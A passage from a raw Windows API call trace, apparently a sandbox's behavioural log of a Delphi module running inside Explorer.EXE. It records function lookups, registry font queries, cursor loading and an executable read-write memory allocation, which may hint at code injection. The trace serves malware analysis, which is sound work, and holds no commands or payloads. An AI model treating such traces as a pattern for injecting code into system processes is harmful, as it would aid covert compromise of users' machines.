0x76efb0dc [0039.494] GetProcAddress (hModule=0x76ee0000, lpProcName="VarI4FromStr") returned 0x76ef6fab [0039.494] GetProcAddress (hModule=0x76ee0000, lpProcName="VarR4FromStr") returned 0x76f001a0 [0039.494] GetProcAddress (hModule=0x76ee0000, lpProcName="VarR8FromStr") returned 0x76ef699e [0039.495] GetProcAddress (hModule=0x76ee0000, lpProcName="VarDateFromStr") returned 0x76f06ba7 [0039.495] GetProcAddress (hModule=0x76ee0000, lpProcName="VarCyFromStr") returned 0x76f26c12 [0039.496] GetProcAddress (hModule=0x76ee0000, lpProcName="VarBoolFromStr") returned 0x76efdbd1 [0039.496] GetProcAddress (hModule=0x76ee0000, lpProcName="VarBstrFromCy") returned 0x76f07fdc [0039.497] GetProcAddress (hModule=0x76ee0000, lpProcName="VarBstrFromDate") returned 0x76ef7a2a [0039.497] GetProcAddress (hModule=0x76ee0000, lpProcName="VarBstrFromBool") returned 0x76f00355 [0039.498] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75900000 [0039.498] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeConditionVariable", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0039.498] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeConditionVariable", cchWideChar=27, lpMultiByteStr=0x71e678c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InitializeConditionVariable", lpUsedDefaultChar=0x0) returned 27 [0039.498] GetProcAddress (hModule=0x75900000, lpProcName="InitializeConditionVariable") returned 0x77259981 [0039.498] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeConditionVariable", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0039.498] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeConditionVariable", cchWideChar=21, lpMultiByteStr=0x71df574, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WakeConditionVariable", lpUsedDefaultChar=0x0) returned 21 [0039.499] GetProcAddress (hModule=0x75900000, lpProcName="WakeConditionVariable") returned 0x772a5a7b [0039.499] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeAllConditionVariable", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0039.499] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeAllConditionVariable", cchWideChar=24, lpMultiByteStr=0x71e678c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WakeAllConditionVariable", lpUsedDefaultChar=0x0) returned 24 [0039.499] GetProcAddress (hModule=0x75900000, lpProcName="WakeAllConditionVariable") returned 0x772245a5 [0039.499] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SleepConditionVariableCS", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0039.499] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SleepConditionVariableCS", cchWideChar=24, lpMultiByteStr=0x71e678c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SleepConditionVariableCS", lpUsedDefaultChar=0x0) returned 24 [0039.500] GetProcAddress (hModule=0x75900000, lpProcName="SleepConditionVariableCS") returned 0x759318be [0039.500] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0xb2c [0039.500] GetACP () returned 0x4e4 [0039.500] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x68ff858 | out: lpCPInfo=0x68ff858) returned 1 [0039.500] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x6b4 [0039.500] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x354 [0039.501] QueryPerformanceCounter (in: lpPerformanceCount=0x68ff87c | out: lpPerformanceCount=0x68ff87c*=16438334048069) returned 1 [0039.501] GetDC (hWnd=0x0) returned 0x1901023f [0039.501] GetDeviceCaps (hdc=0x1901023f, index=90) returned 96 [0039.501] ReleaseDC (hWnd=0x0, hDC=0x1901023f) returned 1 [0039.501] GetDC (hWnd=0x0) returned 0x1901023f [0039.501] GetDeviceCaps (hdc=0x1901023f, index=104) returned 0 [0039.501] ReleaseDC (hWnd=0x0, hDC=0x1901023f) returned 1 [0039.501] CreatePalette (plpal=0x68ff48c) returned 0x2d080250 [0039.501] GetStockObject (i=7) returned 0x1b00017 [0039.501] GetStockObject (i=5) returned 0x1900015 [0039.501] GetStockObject (i=13) returned 0x18a002e [0039.501] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0039.501] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11 [0039.501] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontSubstitutes", ulOptions=0x0, samDesired=0x20019, phkResult=0x68ff76c | out: phkResult=0x68ff76c*=0x374) returned 0x0 [0039.501] RegQueryValueExW (in: hKey=0x374, lpValueName="MS Shell Dlg 2", lpReserved=0x0, lpType=0x68ff740, lpData=0x0, lpcbData=0x68ff758*=0x0 | out: lpType=0x68ff740*=0x1, lpData=0x0, lpcbData=0x68ff758*=0xe) returned 0x0 [0039.502] RegQueryValueExW (in: hKey=0x374, lpValueName="MS Shell Dlg 2", lpReserved=0x0, lpType=0x68ff754, lpData=0x71c9b9c, lpcbData=0x68ff764*=0xe | out: lpType=0x68ff754*=0x1, lpData="Tahoma", lpcbData=0x68ff764*=0xe) returned 0x0 [0039.502] RegCloseKey (hKey=0x374) returned 0x0 [0039.502] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Tahoma", cchWideChar=6, lpMultiByteStr=0x68ff799, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Tahomauÿÿ", lpUsedDefaultChar=0x0) returned 6 [0039.502] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75900000 [0039.503] GetProcAddress (hModule=0x75900000, lpProcName="GetLogicalProcessorInformation") returned 0x75932004 [0039.503] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75900000 [0039.503] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x13fab8 [0039.504] GetProcAddress (hModule=0x75900000, lpProcName="GetLogicalProcessorInformation") returned 0x75932004 [0039.504] GetLogicalProcessorInformation (in: Buffer=0x0, ReturnedLength=0x68ff860 | out: Buffer=0x0, ReturnedLength=0x68ff860) returned 0 [0039.504] GetLastError () returned 0x7a [0039.504] GetLogicalProcessorInformation (in: Buffer=0x71c26a0, ReturnedLength=0x68ff860 | out: Buffer=0x71c26a0, ReturnedLength=0x68ff860) returned 1 [0039.504] GetCurrentThreadId () returned 0xc04 [0039.504] GetCurrentThreadId () returned 0xc04 [0039.504] GetCurrentThreadId () returned 0xc04 [0039.504] GetCurrentThreadId () returned 0xc04 [0039.504] GetCurrentThreadId () returned 0xc04 [0039.504] GetCurrentThreadId () returned 0xc04 [0039.504] GetCurrentThreadId () returned 0xc04 [0039.504] GetCurrentThreadId () returned 0xc04 [0039.504] GetCurrentThreadId () returned 0xc04 [0039.504] GetCurrentThreadId () returned 0xc04 [0039.504] GetCurrentThreadId () returned 0xc04 [0039.504] GetCurrentThreadId () returned 0xc04 [0039.505] GetCurrentThreadId () returned 0xc04 [0039.505] GetCurrentThreadId () returned 0xc04 [0039.505] GetCurrentThreadId () returned 0xc04 [0039.505] GetCurrentThreadId () returned 0xc04 [0039.505] GetCurrentThreadId () returned 0xc04 [0039.505] GetCurrentThreadId () returned 0xc04 [0039.505] GetCurrentThreadId () returned 0xc04 [0039.505] GetCurrentThreadId () returned 0xc04 [0039.505] GetCurrentThreadId () returned 0xc04 [0039.505] GetCurrentThreadId () returned 0xc04 [0039.505] GetCurrentThreadId () returned 0xc04 [0039.505] GetCurrentThreadId () returned 0xc04 [0039.505] GetCurrentThreadId () returned 0xc04 [0039.505] GetCurrentThreadId () returned 0xc04 [0039.505] GetCurrentThreadId () returned 0xc04 [0039.506] GetModuleHandleW (lpModuleName="ole32.dll") returned 0x76a90000 [0039.506] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoCreateInstanceEx", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0039.506] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoCreateInstanceEx", cchWideChar=18, lpMultiByteStr=0x71df68c, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoCreateInstanceEx", lpUsedDefaultChar=0x0) returned 18 [0039.506] GetProcAddress (hModule=0x76a90000, lpProcName="CoCreateInstanceEx") returned 0x76ad9d4e [0039.506] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitializeEx", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0039.506] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitializeEx", cchWideChar=14, lpMultiByteStr=0x71c9bbc, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoInitializeEx", lpUsedDefaultChar=0x0) returned 14 [0039.507] GetProcAddress (hModule=0x76a90000, lpProcName="CoInitializeEx") returned 0x76ad09ad [0039.507] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoAddRefServerProcess", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0039.507] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoAddRefServerProcess", cchWideChar=21, lpMultiByteStr=0x71df68c, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoAddRefServerProcess", lpUsedDefaultChar=0x0) returned 21 [0039.507] GetProcAddress (hModule=0x76a90000, lpProcName="CoAddRefServerProcess") returned 0x76af3cf3 [0039.507] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoReleaseServerProcess", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0039.507] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoReleaseServerProcess", cchWideChar=22, lpMultiByteStr=0x71df68c, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoReleaseServerProcess", lpUsedDefaultChar=0x0) returned 22 [0039.508] GetProcAddress (hModule=0x76a90000, lpProcName="CoReleaseServerProcess") returned 0x76af4314 [0039.508] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoResumeClassObjects", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0039.508] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoResumeClassObjects", cchWideChar=20, lpMultiByteStr=0x71df68c, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoResumeClassObjects", lpUsedDefaultChar=0x0) returned 20 [0039.508] GetProcAddress (hModule=0x76a90000, lpProcName="CoResumeClassObjects") returned 0x76a9ea02 [0039.508] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoSuspendClassObjects", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0039.508] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoSuspendClassObjects", cchWideChar=21, lpMultiByteStr=0x71df68c, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoSuspendClassObjects", lpUsedDefaultChar=0x0) returned 21 [0039.509] GetProcAddress (hModule=0x76a90000, lpProcName="CoSuspendClassObjects") returned 0x76afbb02 [0039.509] GetVersionExW (in: lpVersionInformation=0x68ff790*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x71a2a581, dwMinorVersion=0x71df68c, dwBuildNumber=0x76a90000, dwPlatformId=0xffff, szCSDVersion="") | out: lpVersionInformation=0x68ff790*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0039.509] GetVersion () returned 0x1db10106 [0039.509] GetCurrentProcessId () returned 0x4f0 [0039.509] GlobalAddAtomW (lpString="Delphi000004F0") returned 0xc032 [0039.509] GetCurrentThreadId () returned 0xc04 [0039.509] GlobalAddAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0039.509] RegisterClipboardFormatW (lpszFormat="DelphiRM_GetObjectInstance") returned 0xc106 [0039.509] SetErrorMode (uMode=0x8000) returned 0x1 [0039.510] LoadLibraryW (lpLibFileName="imm32.dll") returned 0x76630000 [0039.510] SetErrorMode (uMode=0x1) returned 0x8000 [0039.510] GetSystemMetrics (nIndex=19) returned 1 [0039.510] GetSystemMetrics (nIndex=75) returned 1 [0039.510] SystemParametersInfoW (in: uiAction=0x68, uiParam=0x0, pvParam=0x71fc260, fWinIni=0x0 | out: pvParam=0x71fc260) returned 1 [0039.510] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0039.510] LoadCursorW (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015 [0039.510] LoadCursorW (hInstance=0x0, lpCursorName=0x7f89) returned 0x1001f [0039.510] LoadCursorW (hInstance=0x0, lpCursorName=0x7f8b) returned 0x1001b [0039.510] LoadCursorW (hInstance=0x0, lpCursorName=0x7f8a) returned 0x10019 [0039.510] LoadCursorW (hInstance=0x0, lpCursorName=0x7f88) returned 0x10017 [0039.510] LoadCursorW (hInstance=0x6ba0000, lpCursorName=0x7ffa) returned 0xe012f [0039.511] LoadCursorW (hInstance=0x6ba0000, lpCursorName=0x7ffb) returned 0xe0125 [0039.511] LoadCursorW (hInstance=0x6ba0000, lpCursorName=0x7ffc) returned 0x70129 [0039.512] LoadCursorW (hInstance=0x6ba0000, lpCursorName=0x7ffd) returned 0x3015b [0039.512] LoadCursorW (hInstance=0x6ba0000, lpCursorName=0x7fff) returned 0x20169 [0039.512] LoadCursorW (hInstance=0x6ba0000, lpCursorName=0x7ffe) returned 0x2016b [0039.512] LoadCursorW (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007 [0039.512] LoadCursorW (hInstance=0x0, lpCursorName=0x7f04) returned 0x1000b [0039.512] LoadCursorW (hInstance=0x0, lpCursorName=0x7f84) returned 0x10011 [0039.513] LoadCursorW (hInstance=0x0, lpCursorName=0x7f82) returned 0x1000d [0039.513] LoadCursorW (hInstance=0x0, lpCursorName=0x7f85) returned 0x10013 [0039.513] LoadCursorW (hInstance=0x0, lpCursorName=0x7f83) returned 0x1000f [0039.513] LoadCursorW (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015 [0039.513] LoadCursorW (hInstance=0x0, lpCursorName=0x7f01) returned 0x10005 [0039.513] LoadCursorW (hInstance=0x0, lpCursorName=0x7f03) returned 0x10009 [0039.513] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0039.513] GetKeyboardLayout (idThread=0x0) returned 0x4090409 [0039.513] GetDC (hWnd=0x0) returned 0x1901023f [0039.513] GetDeviceCaps (hdc=0x1901023f, index=90) returned 96 [0039.513] ReleaseDC (hWnd=0x0, hDC=0x1901023f) returned 1 [0039.513] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x6d02288, dwData=0x71d10d8) returned 1 [0039.513] GetCurrentThread () returned 0xfffffffe [0039.513] GetCurrentThreadId () returned 0xc04 [0039.513] GetCurrentThreadId () returned 0xc04 [0039.513] GetCurrentThreadId () returned 0xc04 [0039.513] GetCurrentThreadId () returned 0xc04 [0039.514] SystemParametersInfoW (in: uiAction=0x1f, uiParam=0x5c, pvParam=0x68ff7d4, fWinIni=0x0 | out: pvParam=0x68ff7d4) returned 1 [0039.514] CreateFontIndirectW (lplf=0x68ff7d4) returned 0x110a06cb [0039.514] GetObjectW (in: h=0x110a06cb, c=92, pv=0x68ff4c8 | out: pv=0x68ff4c8) returned 92 [0039.514] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Segoe UI", cchWideChar=8, lpMultiByteStr=0x68ff3c9, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Segoe UI", lpUsedDefaultChar=0x0) returned 8 [0039.514] SystemParametersInfoW (in: uiAction=0x29, uiParam=0x0, pvParam=0x68ff5dc, fWinIni=0x0 | out: pvParam=0x68ff5dc) returned 1 [0039.514] CreateFontIndirectW (lplf=0x68ff718) returned 0x2e0a00d1 [0039.514] GetObjectW (in: h=0x2e0a00d1, c=92, pv=0x68ff4c8 | out: pv=0x68ff4c8) returned 92 [0039.514] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Segoe UI", cchWideChar=8, lpMultiByteStr=0x68ff3c9, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Segoe UI", lpUsedDefaultChar=0x0) returned 8 [0039.515] CreateFontIndirectW (lplf=0x68ff6bc) returned 0x130a06b0 [0039.515] GetObjectW (in: h=0x130a06b0, c=92, pv=0x68ff4c8 | out: pv=0x68ff4c8) returned 92 [0039.515] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Segoe UI", cchWideChar=8, lpMultiByteStr=0x68ff3c9, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Segoe UI", lpUsedDefaultChar=0x0) returned 8 [0039.515] CreateFontIndirectW (lplf=0x68ff774) returned 0x260a026f [0039.515] GetObjectW (in: h=0x260a026f, c=92, pv=0x68ff4c8 | out: pv=0x68ff4c8) returned 92 [0039.515] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Segoe UI", cchWideChar=8, lpMultiByteStr=0x68ff3c9, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Segoe UI", lpUsedDefaultChar=0x0) returned 8 [0039.515] CreateFontIndirectW (lplf=0x68ff5f4) returned 0x190a0257 [0039.515] GetObjectW (in: h=0x190a0257, c=92, pv=0x68ff4c8 | out: pv=0x68ff4c8) returned 92 [0039.515] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Segoe UI", cchWideChar=8, lpMultiByteStr=0x68ff3c9, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Segoe UI", lpUsedDefaultChar=0x0) returned 8 [0039.516] LoadIconW (hInstance=0x0, lpIconName="MAINICON") returned 0x0 [0039.516] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x68ff656, nSize=0x100 | out: lpFilename="C:\\Windows\\Explorer.EXE") returned 0x17 [0039.516] GetClassInfoW (in: hInstance=0x6ba0000, lpClassName="TPUtilWindow", lpWndClass=0x68ff5f4 | out: lpWndClass=0x68ff5f4) returned 0 [0039.516] RegisterClassW (lpWndClass=0x6de4678) returned 0xc05a [0039.516] CreateWindowExW (dwExStyle=0x80, lpClassName="TPUtilWindow", lpWindowName="", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x6ba0000, lpParam=0x0) returned 0x30152 [0039.518] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0x4fe0000 [0039.518] SetWindowLongW (hWnd=0x30152, nIndex=-4, dwNewLong=83759087) returned 112917644 [0039.518] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x68ff6b5, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 0 [0039.519] GetKeyboardLayoutList (in: nBuff=64, lpList=0x68ff6d8 | out: lpList=0x68ff6d8) returned 1 [0039.519] LoadLibraryA (lpLibFileName="imm32.dll") returned 0x76630000 [0039.519] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x13fac8 [0039.520] GetProcAddress (hModule=0x76630000, lpProcName="ImmIsIME") returned 0x76632ceb [0039.520] ImmIsIME () returned 0x1 [0039.520] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Keyboard Layouts\\04090409", ulOptions=0x0, samDesired=0x20019, phkResult=0x68ff7e0 | out: phkResult=0x68ff7e0*=0x0) returned 0x2 [0039.520] GetCurrentThreadId () returned 0xc04 [0039.521] GetCurrentThreadId () returned 0xc04 [0039.521] GetCurrentThreadId () returned 0xc04 [0039.522] GetModuleHandleW (lpModuleName="USER32") returned 0x76ca0000 [0039.522] GetCurrentThreadId () returned 0xc04 [0039.522] GetCurrentThreadId () returned 0xc04 [0039.522] GetCurrentThreadId () returned 0xc04 [0039.522] GetCurrentThreadId () returned 0xc04 [0039.522] GetCurrentThreadId () returned 0xc04 [0039.522] GetCurrentThreadId () returned 0xc04 [0039.522] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="AnimateWindow", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0039.522] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="AnimateWindow", cchWideChar=13, lpMultiByteStr=0x71c9cbc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AnimateWindow", lpUsedDefaultChar=0x0) returned 13 [0039.523] GetProcAddress (hModule=0x76ca0000, lpProcName="AnimateWindow") returned 0x76cd0620 [0039.523] GetCurrentThreadId () returned 0xc04 [0039.523] GetCurrentThreadId () returned 0xc04 [0039.523] GetCurrentThreadId () returned 0xc04 [0039.523] GetCurrentThreadId () returned 0xc04 [0039.523] GetCurrentThreadId () returned 0xc04 [0039.523] GetCurrentThreadId () returned 0xc04 [0039.523] GetCurrentThreadId () returned 0xc04 [0039.523] GetCurrentThreadId () returned 0xc04 [0039.523] GetCurrentThreadId () returned 0xc04 [0039.523] GetCurrentThreadId () returned 0xc04 [0039.523] GetCurrentThreadId () returned 0xc04 [0039.523] GetCurrentThreadId () returned 0xc04 [0039.523] GetCurrentThreadId () returned 0xc04 [0039.523] GetCurrentThreadId () returned 0xc04 [0039.523] GetCurrentThreadId () returned 0xc04 [0039.523] RegisterClipboardFormatW (lpszFormat="Delphi Picture") returned 0xc108 [0039.523] RegisterClipboardFormatW (lpszFormat="Delphi Component") returned 0xc109 [0039.523] RegisterClipboardFormatW (lpszFormat="commdlg_help") returned 0xc10a [0039.523] RegisterClipboardFormatW (lpszFormat="commdlg_FindReplace") returned 0xc10b [0039.523] GetCurrentThreadId () returned 0xc04 [0039.523] GlobalAddAtomW (lpString="WndProcPtr06BA000000000C04") returned 0xc030 [0039.523] GetCurrentThreadId () returned 0xc04 [0039.523] GetCurrentThreadId () returned 0xc04 [0039.523] GetCurrentThreadId () returned 0xc04 [0039.523] GetCurrentThreadId () returned 0xc04 [0039.524] GetCurrentThreadId () returned 0xc04 [0039.524] GetCurrentThreadId () returned 0xc04 [0039.524] GetCurrentThreadId () returned 0xc04 [0039.524] GetCurrentThreadId () returned 0xc04 [0039.524] GetCurrentThreadId () returned 0xc04 [0039.524] GetCurrentThreadId () returned 0xc04 [0039.524] GetCurrentThreadId () returned 0xc04 [0039.524] GetCurrentThreadId () returned 0xc04 [0039.524] GetCurrentThreadId () returned 0xc04 [0039.524] GetCurrentThreadId () returned 0xc04 [0039.524] GetCurrentThreadId () returned 0xc04 [0039.524] GetCurrentThreadId () returned 0xc04 [0039.524] GetCurrentThreadId () returned 0xc04 [0039.524] GetCurrentThreadId () returned 0xc04 [0039.524] GetCurrentThreadId () returned 0xc04 [0039.524] GetCurrentThreadId () returned 0xc04 [0039.524] GetCurrentThreadId () returned 0xc04 [0039.524] GetCurrentThreadId () returned 0xc04 [0039.524] GetCurrentThreadId () returned 0xc04 [0039.524] GetCurrentThreadId () returned 0xc04 [0039.524] RegisterClipboardFormatW (lpszFormat="TaskbarCreated") returned 0xc0bf [0039.524] LoadStringW (in: hInstance=0x6ba0000, uID=0xfef9, lpBuffer=0x68fd880, cchBufferMax=4096 | out: lpBuffer="Alt+") returned 0x4 [0039.524] LoadStringW (in: hInstance=0x6ba0000, uID=0xfef8, lpBuffer=0x68fd880, cchBufferMax=4096 | out: lpBuffer="Ctrl+") returned 0x5 [0039.524] LoadStringW (in: hInstance=0x6ba0000, uID=0xfef7, lpBuffer=0x68fd880, cchBufferMax=4096 | out: lpBuffer="Shift+") returned 0x6 [0039.524] LoadStringW (in: hInstance=0x6ba0000, uID=0xfef6, lpBuffer=0x68fd880, cchBufferMax=4096 | out: lpBuffer="Del") returned 0x3 [0039.524] LoadStringW (in: hInstance=0x6ba0000, uID=0xfef5, lpBuffer=0x68fd880, cchBufferMax=4096 | out: lpBuffer="Ins") returned 0x3 [0039.524] LoadStringW (in: hInstance=0x6ba0000, uID=0xfef4, lpBuffer=0x68fd880, cchBufferMax=4096 | out: lpBuffer="Down") returned 0x4 [0039.524] LoadStringW (in: hInstance=0x6ba0000, uID=0xfef3, lpBuffer=0x68fd880, cchBufferMax=4096 | out: lpBuffer="Right") returned 0x5 [0039.524] LoadStringW (in: hInstance=0x6ba0000, uID=0xfef2, lpBuffer=0x68fd880, cchBufferMax=4096 | out: lpBuffer="Up") returned 0x2 [0039.524] LoadStringW (in: hInstance=0x6ba0000, uID=0xfef1, lpBuffer=0x68fd880, cchBufferMax=4096 | out: lpBuffer="Left") returned 0x4 [0039.524] LoadStringW (in: hInstance=0x6ba0000, uID=0xfef0, lpBuffer=0x68fd880, cchBufferMax=4096 | out: lpBuffer="Home") returned 0x4 [0039.525] LoadStringW (in: hInstance=0x6ba0000, uID=0xff0f, lpBuffer=0x68fd880, cchBufferMax=4096 | out: lpBuffer="End") returned 0x3 [0039.525] LoadStringW (in: hInstance=0x6ba0000, uID=0xff0e, lpBuffer=0x68fd880, cchBufferMax=4096 | out: lpBuffer="PgDn") returned 0x4 [0039.525] LoadStringW (in: hInstance=0x6ba0000, uID=0xff0d, lpBuffer=0x68fd880, cchBufferMax=4096 | out: lpBuffer="PgUp") returned 0x4 [0039.525] LoadStringW (in: hInstance=0x6ba0000, uID=0xff0c, lpBuffer=0x68fd880, cchBufferMax=4096 | out: lpBuffer="Space") returned 0x5 [0039.525] LoadStringW (in: hInstance=0x6ba0000, uID=0xff0b, lpBuffer=0x68fd880, cchBufferMax=4096 | out: lpBuffer="Enter") returned 0x5 [0039.525] LoadStringW (in: hInstance=0x6ba0000, uID=0xff0a, lpBuffer=0x68fd880, cchBufferMax=4096 | out: lpBuffer="Esc") returned 0x3 [0039.525] LoadStringW (in: hInstance=0x6ba0000, uID=0xff09, lpBuffer=0x68fd880, cchBufferMax=4096 | out: lpBuffer="Tab") returned 0x3 [0039.525] LoadStringW (in: hInstance=0x6ba0000, uID=0xff08, lpBuffer=0x68fd880, cchBufferMax=4096 | out: lpBuffer="BkSp") returned 0x4 [0039.525] GetCurrentThreadId () returned 0xc04 [0039.525] GetCurrentThreadId () returned 0xc04 [0039.525] GetCurrentThreadId () returned 0xc04 [0039.525] GetCurrentThreadId () returned 0xc04 [0039.525] GetCurrentThreadId () returned 0xc04 [0039.525] GetCurrentThreadId () returned 0xc04 [0039.525] GetCurrentThreadId () returned 0xc04 [0039.525] GetCurrentThreadId () returned 0xc04 [0039.525] GetCurrentThreadId () returned 0xc04 [0039.525] GetCurrentThreadId () returned 0xc04 [0039.525] GetCurrentThreadId () returned 0xc04 [0039.525] GetCurrentThreadId () 